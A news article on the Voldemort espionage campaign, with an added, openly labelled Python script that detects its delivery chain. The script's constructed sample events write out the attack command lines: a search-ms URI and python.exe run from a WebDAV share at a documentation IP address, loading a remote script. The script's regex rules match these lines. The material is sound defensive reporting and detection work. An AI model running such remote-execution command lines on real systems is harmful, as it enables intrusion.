Cybersecurity experts have uncovered a new malware operation that uses Google Sheets as a command-and-control (C2) platform.
Proofpoint first detected the activity on August 5, 2024. In it, the attackers impersonate tax authorities from various countries in Europe, Asia, and the U.S., targeting more than 70 organizations worldwide with a custom tool called Voldemort that is designed to gather data and deploy further malicious software.
The targeted industries include insurance, aerospace, transportation, academia, finance, technology, industrial sectors, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecommunications, and social benefit organizations.
This suspected cyber espionage operation hasn’t been linked to any known threat actor. The attackers have sent approximately 20,000 emails as part of the campaign.
These emails falsely claim to be from tax authorities in countries like the U.S., U.K., France, Germany, Italy, India, and Japan, informing recipients about updates to their tax filings and urging them to click on Google AMP Cache URLs that redirect them to a secondary webpage.
The landing page checks the User-Agent string to determine whether the visitor is running Windows. If so, it abuses the search-ms: URI protocol handler to display a Windows shortcut (LNK) file disguised as an Adobe Acrobat Reader PDF, tricking the user into opening it.
“If the LNK file is executed, it triggers PowerShell to run Python.exe from a WebDAV share (\library), which then runs a Python script from another share (\resource) on the same host,” explained Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson.
This method runs the Python script directly, without downloading files to the user’s computer, as the necessary dependencies are loaded from the WebDAV share.
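As an added example, not part of the article or of Proofpoint's research, the Python below runs simple detection rules for the delivery chain just described over constructed Sysmon-style process-creation events (the field names, paths and the RFC 5737 test address 203.0.113.10 are all assumptions): a search-ms: URI whose location is a remote share, and python.exe launched from one WebDAV share with its script on another.

```python
import re

# Process-creation events in Sysmon Event ID 1 style, CONSTRUCTED for this example.
# 203.0.113.10 is an RFC 5737 documentation address, not a real indicator.
SAMPLE_EVENTS: list[dict[str, str]] = [
    {   # landing page hands a search-ms: URI to Explorer, pointing at a remote WebDAV share
        "parent": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
        "image": r"C:\Windows\explorer.exe",
        "cmdline": r'explorer.exe "search-ms:query=TaxForm&crumb=location:\\203.0.113.10@SSL\DavWWWRoot\share"',
    },
    {   # the LNK ran PowerShell, which launches python.exe from one share with a script on another
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"\\203.0.113.10@SSL\DavWWWRoot\library\python.exe",
        "cmdline": r"\\203.0.113.10@SSL\DavWWWRoot\library\python.exe \\203.0.113.10@SSL\DavWWWRoot\resource\stage.py",
    },
    {   # benign control: a developer runs a local script from PowerShell
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Python312\python.exe",
        "cmdline": r"python.exe C:\Users\dev\build.py",
    },
]

# UNC path such as \\host\share\... or the WebDAV form \\host@SSL\DavWWWRoot\...
REMOTE_PATH = re.compile(r'\\\\[^\\\s"]+\\[^\s"]*')
INTERPRETERS = {"python.exe", "pythonw.exe"}
URI_HANDLERS = ("search-ms:", "file://")

def detect(event: dict[str, str]) -> list[str]:
    """Return the names of the rules an event matches; an empty list means clean."""
    hits, cmd = [], event["cmdline"]
    # Rule 1: search-ms:/file:// URI whose location is a remote share (the landing-page step)
    if any(h in cmd.lower() for h in URI_HANDLERS) and REMOTE_PATH.search(cmd):
        hits.append("uri_handler_to_remote_share")
    if event["image"].rsplit("\\", 1)[-1].lower() in INTERPRETERS:
        # Rule 2: the interpreter binary itself is loaded from a share (the \library step)
        if REMOTE_PATH.match(event["image"]):
            hits.append("interpreter_run_from_share")
        # Rule 3: the script passed to it lives on a share (the \resource step)
        if any(REMOTE_PATH.match(arg) for arg in cmd.split()[1:]):
            hits.append("interpreter_given_remote_script")
    return hits

def scan(events: list[dict[str, str]]) -> dict[int, list[str]]:
    """Map the index of each flagged event to its rule hits; clean events are omitted."""
    return {i: hits for i, ev in enumerate(events) if (hits := detect(ev))}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```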
The script is crafted to collect system information, sending the data as a Base64-encoded string to a domain controlled by the attackers. Following this, a decoy PDF is shown to the user, and a password-protected ZIP file is downloaded from OpenDrive.
Inside the ZIP file are two components: a legitimate executable “CiscoCollabHost.exe” that is vulnerable to DLL side-loading, and a malicious DLL “CiscoSparkLauncher.dll” (known as Voldemort), which is sideloaded.
Voldemort is a custom backdoor written in C, capable of gathering information and deploying further payloads. The malware leverages Google Sheets for C2, data exfiltration, and executing commands from the attackers.
Proofpoint described the campaign as consistent with advanced persistent threat (APT) activity, but noted that it also has elements common in cybercrime, such as techniques popular among e-criminals.
“Threat actors exploit file schema URIs to access external file-sharing resources for staging malware, particularly WebDAV and Server Message Block (SMB). This is done by using the schema ‘file://’ to connect to a remote server hosting the malicious content,” the researchers noted.
This approach has become more common among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.
Additionally, Proofpoint was able to access the contents of the Google Sheet used by the attackers, identifying six victims, one of whom might be a sandbox or a “known researcher.”
The campaign’s unusual nature suggests that the attackers cast a wide net before focusing on a smaller group of targets. It’s also possible that the perpetrators, who may have varying levels of technical skill, aimed to infect multiple organizations.
“While many aspects of this campaign resemble cybercriminal activity, we believe this is likely espionage aimed at supporting still unknown objectives,” the researchers stated.
“The mix of advanced and basic techniques used in this campaign makes it challenging to assess the threat actor’s full capabilities and to determine with high confidence the ultimate goals of the operation.”
This discovery coincides with Netskope Threat Labs uncovering an updated version of Latrodectus (version 1.4), which includes a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.
“Latrodectus has been rapidly evolving, adding new features to its payload,” said security researcher Leandro Fróes. “Understanding these updates helps defenders to adjust their automated pipelines and improve the detection of new variants.”